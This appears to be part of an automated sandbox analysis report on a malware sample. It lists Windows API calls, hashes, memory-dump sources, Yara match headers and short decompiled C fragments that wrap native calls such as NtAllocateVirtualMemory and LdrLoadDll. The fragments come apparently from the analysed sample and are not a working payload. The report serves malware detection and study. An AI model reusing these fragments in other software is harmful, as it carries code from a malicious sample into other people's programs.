                                      • Opcode ID: 76c8841a61c96e482df5558814c957da457fd9c276d2aa145703ab34968c59ff
                                      • Instruction ID: 95a46eac84c1e509314344388b5ef7e7b0816f16b4b4fc0e9a22a5c5ff7339f8
                                      • Instruction Fuzzy Hash: CAE01A70C08214DBE710AF65EC4835A3BA0EB82311F108837E486A6271E7B89C80DF9F

                                      APIs
                                        • Part of subcall function 00438F7B: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0043CC56,00000009,?,?,?,0043858B,00000001,00000074,?,0043683B), ref: 00438FB8
                                        • Part of subcall function 00438F7B: EnterCriticalSection.KERNEL32(?,?,?,0043CC56,00000009,?,?,?,0043858B,00000001,00000074,?,0043683B), ref: 00438FD3
                                      • GetCPInfo.KERNEL32(00000000,?,?,00000000,00000000,?,?,0043686B), ref: 004376CB
                                        • Part of subcall function 00438FDC: LeaveCriticalSection.KERNEL32(?,004354B5,00000009,?,00000009,00000000,?,00435475,000000E0,00435462,?,00438F9B,00000018,00000000,?), ref: 00438FE9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: CriticalSection$EnterInfoInitializeLeave
                                      • String ID: HF$XF
                                      • API String ID: 1866836854-646221050
                                      • Opcode ID: c6a9f1f7cccdd5da812d37f0800123dd8155f59e4698be3e0fa1f849575e7ef3
                                      • Instruction ID: f39753f84d48a2ed3f28ce5f36f26a9c350bc32ec5d06f3c8928e016bd48fc45
                                      • Instruction Fuzzy Hash: E64186B190C2819EEB35DB38CC8536A7B90AB0C318F24647FE5C997291C7BD48858B4D

                                      APIs
                                      • GetCPInfo.KERNEL32(?,00000000), ref: 004378E1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: Info
                                      • String ID: $
                                      • API String ID: 1807457897-3032137957
                                      • Opcode ID: 397af864cd0f2db1fcb69d81cfd713cb4496fdeceaadf46acc02d4caa7251d2e
                                      • Instruction ID: 49d30ddff10ff31b58ae4e71c5700e9fac701cbe5ec942c122374422679f7409
                                      • Instruction Fuzzy Hash: 8A419DB00082981EEB369710CE59FFB7F99DB09700F1428E6D1C9D7152C2A94E44C7AA

                                      APIs
                                        • Part of subcall function 0043E526: SetFilePointer.KERNEL32(00000000,?,00000000,00000000,00000000,?,0043AAD0,?,00000000,00000002,00000001,?,18E8F04D), ref: 0043E550
                                        • Part of subcall function 0043E526: GetLastError.KERNEL32 ref: 0043E55D
                                      • SetEndOfFile.KERNEL32(00000000,?,?,?,00000100,?,?,?,0043E43D,00000000,00000040), ref: 0043F5A8
                                      • GetLastError.KERNEL32(?,?,?,00000100,?,?,?,0043E43D,00000000,00000040), ref: 0043F5C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: ErrorFileLast$Pointer
                                      • String ID: =C
                                      • API String ID: 1697706070-1630774198
                                      • Opcode ID: 53075e7f5276adc774f65d359c5c73ea1f0e2b32b6b68f97322666287c7b0fcf
                                      • Instruction ID: 1571ce1a920cda114943dfa8a0a5a0ee5d1dff03d79d33ef405b65b9f4806e97
                                      • Instruction Fuzzy Hash: F831E772D011187BCF212FA5CC05B8D7A64DF0C368F105177F9189A2E2EA79DE49869D

                                      APIs
                                      • GetDriveTypeA.KERNEL32 ref: 004114F9
                                      • GetVolumeInformationA.KERNEL32(00000000,?,000000C8,00000000,00000000,00000000,?,00000032), ref: 00411594
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: DriveInformationTypeVolume
                                      • String ID: %s (%s)
                                      • API String ID: 3149825354-1363028141
                                      • Opcode ID: dbfc93d42c4cb7481d6521219dda1b3141f3433a07f5a61e2dd8b37464bf8cf6
                                      • Instruction ID: 4a1e0a255166fe4b5b330b30b86dd96cf94ea14925c085261e896a0e202ca46e
                                      • Instruction Fuzzy Hash: 2F41B271900259ABDB14DF94DC51BEAB378EB09704F0046ABE20563291EB786B89CFA5

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: ChildLongWindow
                                      • String ID: 0
                                      • API String ID: 1178903432-4108050209
                                      • Opcode ID: a902183169456247e215e5b721f9b0c7285cf09b1bbe427c5508e197e4b18b62
                                      • Instruction ID: 1b5b50ce9eb1b1bac7614952e3c3118833895424da258f8d39225c6dcde1b29b
                                      • Instruction Fuzzy Hash: 4E21D1312056107ADB21AA255D81FEF62AC9FEC355F28B13BFC04A2282DB3CFD41856C

                                      APIs
                                      • GetDriveTypeA.KERNEL32 ref: 004114F9
                                      • GetVolumeInformationA.KERNEL32(00000000,?,000000C8,00000000,00000000,00000000,?,00000032), ref: 00411594
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: DriveInformationTypeVolume
                                      • String ID: %s (%s)
                                      • API String ID: 3149825354-1363028141
                                      • Opcode ID: fed8825a6174eb6a5e6e6b183c4e4ac5e771278613ecdc07685e8fe917e4e4a9
                                      • Instruction ID: c4cee799b4bde78382e28564e52fb79fbe02146753b83fc5d9abec2566b03c4e
                                      • Instruction Fuzzy Hash: 07318F719002599FDB14DB94DC51BEEB774AB09304F0089EAE20A73291EB746B89CFA5

                                      APIs
                                        • Part of subcall function 00446FC7: GetWindowLongA.USER32 ref: 00446FD3
                                      • GetWindowRect.USER32 ref: 00444655
                                      • GetWindow.USER32(?,00000004), ref: 00444672
                                        • Part of subcall function 00447123: IsWindowEnabled.USER32(?), ref: 0044712D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: Window$EnabledLongRect
                                      • String ID: (HD
                                      • API String ID: 3170195891-2148437710
                                      • Opcode ID: 81b53796cbe4c2ab622f19b9ba17926e80b083f7fad4096be9b1156554e78074
                                      • Instruction ID: ae6bd5038afdf9cdeb7ebe7558c0fadb38a600f0acd1a88e527810df72ccc1c6
                                      • Instruction Fuzzy Hash: A2017C302006049BEF21EB25CD06B6F77A9AFA3314F02441AED41A7791DB3CEC158698

                                      APIs
                                      • GetDriveTypeA.KERNEL32(?,?,0043E782,?,?), ref: 0043E85F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: DriveType
                                      • String ID: :$\
                                      • API String ID: 338552980-1166558509
                                      • Opcode ID: 7506d28b6cc730651ead06a33dbf0ef10f4a59496ffb11cfa6468eb98a132906
                                      • Instruction ID: b4095f3dc829ddb8c3df49ec82b68750fb39568e5d0cc0986cc31564e8cf6e83
                                      • Instruction Fuzzy Hash: DDE0D83120838C59EF019EB6D44478A3F889B05784F08C057F80CCE281D174D641C35A

                                      APIs
                                      • GetClassNameA.USER32(?,?,00000010), ref: 004419FE
                                      • lstrcmpA.KERNEL32(?,ComboBox,?,00000010), ref: 00441A0E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: ClassNamelstrcmp
                                      • String ID: ComboBox
                                      • API String ID: 3770760073-1152790111
                                      • Opcode ID: c9ac7c9c47adff2366ad3702e425702c68838c6a1ce4ea41fac9e33caaa18a8c
                                      • Instruction ID: 00fb7ca4f4edb7a6fc5d44ab6f70956aee28c8685d7d8cd8936ef68ef85914e9
                                      • Instruction Fuzzy Hash: 9FE04F707103005BE724AB249C09B6A32E4F754703F880E58F559E21B1FBB9D594865A

                                      APIs
                                      • EnterCriticalSection.KERNEL32(?), ref: 0044CFF0
                                      • LeaveCriticalSection.KERNEL32(?,?), ref: 0044D000
                                      • LocalFree.KERNEL32(?), ref: 0044D009
                                      • TlsSetValue.KERNEL32(?,00000000), ref: 0044D01F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                      • String ID:
                                      • API String ID: 2949335588-0
                                      • Opcode ID: 5fff76efc4fafcfddbd1f6ed8f2f221dc9ba574479bc3ced4b3ad8605a86d01f
                                      • Instruction ID: 97a1d3c6ec35dd13cdc6787b2de82705d45a7dfe4c54d2faf67daaddca842d1a
                                      • Instruction Fuzzy Hash: B121AC31202300EFE7208F45D884FAA77A6FF45716F04846AF5029B6A2C779ED45DB59

                                      APIs
                                      • EnterCriticalSection.KERNEL32(004713A8,?,00000000,?,?,0044D13B,00000010,?,00000000,?,?,?,0044C6AC,0044C70F,0044BFA0,0044C6B2), ref: 0044D58E
                                      • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,0044D13B,00000010,?,00000000,?,?,?,0044C6AC,0044C70F,0044BFA0,0044C6B2), ref: 0044D5A0
                                      • LeaveCriticalSection.KERNEL32(004713A8,?,00000000,?,?,0044D13B,00000010,?,00000000,?,?,?,0044C6AC,0044C70F,0044BFA0,0044C6B2), ref: 0044D5A9
                                      • EnterCriticalSection.KERNEL32(00000000,00000000,?,?,0044D13B,00000010,?,00000000,?,?,?,0044C6AC,0044C70F,0044BFA0,0044C6B2,00448804), ref: 0044D5BB
                                        • Part of subcall function 0044D4C0: GetVersion.KERNEL32(?,0044D563,?,0044D13B,00000010,?,00000000,?,?,?,0044C6AC,0044C70F,0044BFA0,0044C6B2,00448804,0044A2B4), ref: 0044D4D3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: CriticalSection$Enter$InitializeLeaveVersion
                                      • String ID:
                                      • API String ID: 1193629340-0
                                      • Opcode ID: 22c3643d2fd531c057fd5072e437a8274add4ee3775240facac5d792a31aa049
                                      • Instruction ID: 79d820d1fa968b498018773431558678df3a25a3eb805de74deb1cfe2c9b71e1
                                      • Opcode Fuzzy Hash: 22c3643d2fd531c057fd5072e437a8274add4ee3775240facac5d792a31aa049
                                      • Instruction Fuzzy Hash: 92F04F7580125AEFEB10DF5DEC84952B3ADFB6031AB000437EA0A93531DB35B595CA6C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • InitializeCriticalSection.KERNEL32(?,00438572,?,0043683B), ref: 00438F5F
                                      • InitializeCriticalSection.KERNEL32(?,00438572,?,0043683B), ref: 00438F67
                                      • InitializeCriticalSection.KERNEL32(?,00438572,?,0043683B), ref: 00438F6F
                                      • InitializeCriticalSection.KERNEL32(?,00438572,?,0043683B), ref: 00438F77
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                       • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: CriticalInitializeSection
                                      • String ID:
                                      • API String ID: 32694325-0
                                      • Opcode ID: 12cffa5d83c66f5025a9d2d97134b505056e9475f5f36922ff8d8c4db7c825e3
                                      • Instruction ID: 1911e4dee6ba7719050be36a5cf963a465d52c641339958a66baff5b97548d41
                                      • Opcode Fuzzy Hash: 12cffa5d83c66f5025a9d2d97134b505056e9475f5f36922ff8d8c4db7c825e3
                                      • Instruction Fuzzy Hash: 2AC00275800238AFCF112B57FC048853FA6EB142637554173F1055507096A25C51DFD9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Executed Functions

                                      C-Code - Quality: 23%
                                      			E0041868C(void* __eax, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                      				void* _t20;
                                      				void* _t29;
                                      				void* _t30;
                                      				intOrPtr* _t31;
                                      				void* _t33;
                                      
                                      				asm("cmc");
                                      				_t15 = _a4;
                                      				_t31 = _a4 + 0xc48;
                                      				E004191E0(_t29, _t15, _t31,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x2a);
                                      				_t4 =  &_a40; // 0x413a31
                                      				_t6 =  &_a32; // 0x413d72
                                      				_t12 =  &_a8; // 0x413d72
                                      				_t20 =  *((intOrPtr*)( *_t31))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4, _t30, _t33); // executed
                                      				return _t20;
                                      			}








                                      0x0041868c
                                      0x00418693
                                      0x0041869f
                                      0x004186a7
                                      0x004186ac
                                      0x004186b2
                                      0x004186cd
                                      0x004186d5
                                      0x004186d9

                                      APIs
                                      • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp
                                       • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: 1:A$r=A$r=A
                                      • API String ID: 2738559852-4243674446
                                      • Opcode ID: 69451c0001bfe70dfe1486e7fcf4de248ecf282a3a63d37af44124ecc26c6108
                                      • Instruction ID: aca1f407819d339c3a7a792f070342dfcb36f705680f473d60106b7526c8bdf0
                                      • Opcode Fuzzy Hash: 69451c0001bfe70dfe1486e7fcf4de248ecf282a3a63d37af44124ecc26c6108
                                      • Instruction Fuzzy Hash: F7F0F4B2200109AFDB04CF99DC81EEB77A9AF8C354F118249FA0DD7244C630EC51CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 37%
                                      			E00418690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                      				void* _t18;
                                      				void* _t27;
                                      				intOrPtr* _t28;
                                      
                                      				_t13 = _a4;
                                      				_t28 = _a4 + 0xc48;
                                      				E004191E0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                      				_t4 =  &_a40; // 0x413a31
                                      				_t6 =  &_a32; // 0x413d72
                                      				_t12 =  &_a8; // 0x413d72
                                      				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                      				return _t18;
                                      			}






                                      0x00418693
                                      0x0041869f
                                      0x004186a7
                                      0x004186ac
                                      0x004186b2
                                      0x004186cd
                                      0x004186d5
                                      0x004186d9

                                      APIs
                                      • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp
                                       • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: 1:A$r=A$r=A
                                      • API String ID: 2738559852-4243674446
                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction ID: 4a498055f1de8b016eb86f05d4d9e2f0ef691a8d0c1c9b5c2f62b7bf89d1b75c
                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction Fuzzy Hash: D9F0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248FA0D97241CA30E851CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp
                                       • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID: I~A
                                      • API String ID: 2167126740-812468771
                                      • Opcode ID: af3eb81bfb912dbaf04c6935011f1f7dc6a3166b630e70b6a4ec00884b533e9c
                                      • Instruction ID: 8cfbee5a14667e63e30d7ecc8199fa9f23ba6b3f0093c7f6a0c2037dec6c376c
                                      • Opcode Fuzzy Hash: af3eb81bfb912dbaf04c6935011f1f7dc6a3166b630e70b6a4ec00884b533e9c
                                      • Instruction Fuzzy Hash: 0F1126B6200219AFDB14EF88DC85EEB77ADEF88750F108559FA1897241CA30E950CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp
                                       • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 2bf6b7dfb157ee7dc7960802a5cf0a7aaef95fec8a6af33fad5df72461be129e
                                      • Instruction ID: 4fe294f8d6695b451609cdeff54228d58b425004672646ae7e0e561440784175
                                      • Opcode Fuzzy Hash: 2bf6b7dfb157ee7dc7960802a5cf0a7aaef95fec8a6af33fad5df72461be129e
                                      • Instruction Fuzzy Hash: BF0148B6200104AFDB04DF98DD85DEB77AEEF8C714F144249F90D97240CA30E841CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00409B40(void* __eflags, void* _a4, intOrPtr _a8) {
                                      				char* _v8;
                                      				struct _EXCEPTION_RECORD _v12;
                                      				struct _OBJDIR_INFORMATION _v16;
                                      				char _v536;
                                      				void* _t15;
                                      				struct _OBJDIR_INFORMATION _t17;
                                      				struct _OBJDIR_INFORMATION _t18;
                                      				void* _t30;
                                      				void* _t31;
                                      				void* _t32;
                                      
                                      				_v8 =  &_v536;
                                      				_t15 = E0041AF70( &_v12, 0x104, _a8);
                                      				_t31 = _t30 + 0xc;
                                      				if(_t15 != 0) {
                                      					_t17 = E0041B390(__eflags, _v8);
                                      					_t32 = _t31 + 4;
                                      					__eflags = _t17;
                                      					if(_t17 != 0) {
                                      						E0041B610( &_v12, 0);
                                      						_t32 = _t32 + 8;
                                      					}
                                      					_t18 = E00419720(_v8);
                                      					_v16 = _t18;
                                      					__eflags = _t18;
                                      					if(_t18 == 0) {
                                      						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                      						return _v16;
                                      					}
                                      					return _t18;
                                      				} else {
                                      					return _t15;
                                      				}
                                      			}













                                      0x00409b5c
                                      0x00409b5f
                                      0x00409b64
                                      0x00409b69
                                      0x00409b73
                                      0x00409b78
                                      0x00409b7b
                                      0x00409b7d
                                      0x00409b85
                                      0x00409b8a
                                      0x00409b8a
                                      0x00409b91
                                      0x00409b99
                                      0x00409b9c
                                      0x00409b9e
                                      0x00409bb2
                                      0x00000000
                                      0x00409bb4
                                      0x00409bba
                                      0x00409b6e
                                      0x00409b6e
                                      0x00409b6e

                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp
                                       • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                      • Instruction ID: 0a0fff248a1c50f77d94468520b7725d30d267451342bd90074e2a3d68e37629
                                      • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                      • Instruction Fuzzy Hash: B50152B5D0010DB7DF10DAE1EC42FDEB378AB54318F0041A6E908A7281F634EB54C795
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp
                                       • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 2c403a48bae9b9af3bb882557e77a3b7565afaf06a03815e8e4050d5364ac463
                                      • Instruction ID: 1dc3906f95748dfc2a0cae637e35c376a31853676daa44fa695532940dffa423
                                      • Opcode Fuzzy Hash: 2c403a48bae9b9af3bb882557e77a3b7565afaf06a03815e8e4050d5364ac463
                                      • Instruction Fuzzy Hash: C301B6B6215209AFCB48CF88DC95DEB77A9AF8C354F158248FA1D97240C630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp
                                       • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction ID: 36c6eae92b8005ba539885d914b12f5379157c135ee825ad128bd076db7cd32f
                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction Fuzzy Hash: 24F0B2B2204208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004187C0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                      				long _t14;
                                      				void* _t21;
                                      
                                      				_t3 = _a4 + 0xc60; // 0xca0
                                      				E004191E0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                      				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                      				return _t14;
                                      			}





                                      0x004187cf
                                      0x004187d7
                                      0x004187f9
                                      0x004187fd

                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp
                                       • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction ID: 15e9253bdc6667238a85ff9da65bd6f3d3aad2e55959b4b07e7d113ae3ba9bea
                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction Fuzzy Hash: 6CF015B2200209ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F910CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00418710(intOrPtr _a4, void* _a8) {
                                      				long _t8;
                                      				void* _t11;
                                      
                                      				_t5 = _a4;
                                      				_t2 = _t5 + 0x10; // 0x300
                                      				_t3 = _t5 + 0xc50; // 0x409763
                                      				E004191E0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                      				_t8 = NtClose(_a8); // executed
                                      				return _t8;
                                      			}





                                      0x00418713
                                      0x00418716
                                      0x0041871f
                                      0x00418727
                                      0x00418735
                                      0x00418739

                                      APIs
                                      • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp
                                       • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 68%
                                      			E0041870B(intOrPtr _a8, void* _a12) {
                                      				long _t8;
                                      				void* _t12;
                                      
                                      				asm("stosb");
                                      				asm("adc eax, 0x8bec8b55");
                                      				_t5 = _a8;
                                      				_t2 = _t5 + 0x10; // 0x300
                                      				_t3 = _t5 + 0xc50; // 0x409763
                                      				E004191E0(_t12, _a8, _t3,  *_t2, 0, 0x2c);
                                      				_t8 = NtClose(_a12); // executed
                                      				return _t8;
                                      			}





                                      0x0041870c
                                      0x0041870d
                                      0x00418713
                                      0x00418716
                                      0x0041871f
                                      0x00418727
                                      0x00418735
                                      0x00418739

                                      APIs
                                      • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp
                                       • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 66e86973879c9bb60a53896baf6160e9d86140dbd917c851256820a544cae62c
                                      • Instruction ID: ccf6313a826aaa7f6eb6fa578ddab1b3769b18e28e355f72b51d457b8fecacc7
                                      • Opcode Fuzzy Hash: 66e86973879c9bb60a53896baf6160e9d86140dbd917c851256820a544cae62c
                                      • Instruction Fuzzy Hash: 21D02EAD40D2C01BDB11EAB8A8D20C27F80EE802183280A8FE8A807203C528E20A9290
